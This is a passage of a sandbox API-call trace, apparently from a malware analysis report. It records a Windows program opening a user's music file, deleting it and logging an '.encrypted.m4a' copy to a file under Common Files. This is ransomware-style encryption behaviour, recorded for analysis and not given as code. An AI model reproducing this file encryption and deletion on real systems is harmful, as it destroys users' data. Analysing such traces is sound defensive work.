hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0038.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.100] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.100] CharLowerBuffW (in: lpsz="byte[22209]", cchLength=0xb | out: lpsz="byte[22209]") returned 0xb [0038.101] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.101] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.101] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.101] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.101] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.102] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.103] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\svumdbh5swjrewp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.103] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.104] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.104] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.104] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.104] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.104] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.104] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.104] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cb80 [0038.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cb80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0038.105] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.105] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.105] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.106] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdd8 [0038.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.106] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.106] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.106] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.106] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFilePart=0x0) returned 0x44 [0038.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0x166c43a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0x7c2240 [0038.107] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\svumdbh5swjrewp.m4a")) returned 1 [0038.107] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0224c0, ftCreationTime.dwHighDateTime=0x1d5c521, ftLastAccessTime.dwLowDateTime=0xddf610, ftLastAccessTime.dwHighDateTime=0x1d5b5a7, ftLastWriteTime.dwLowDateTime=0x166c43a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x56c1, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SvUMdBH5SwJrEWp.m4a", cAlternateFileName="SVUMDB~1.M4A")) returned 0 [0038.108] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.108] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.108] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.108] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.108] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.108] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0038.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.109] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.109] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.109] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.109] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.109] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2444, lpOverlapped=0x0) returned 1 [0038.109] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.109] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2444, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.110] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.110] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\SvUMdBH5SwJrEWp.encrypted.m4a\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0038.110] RtlAllocateHeap 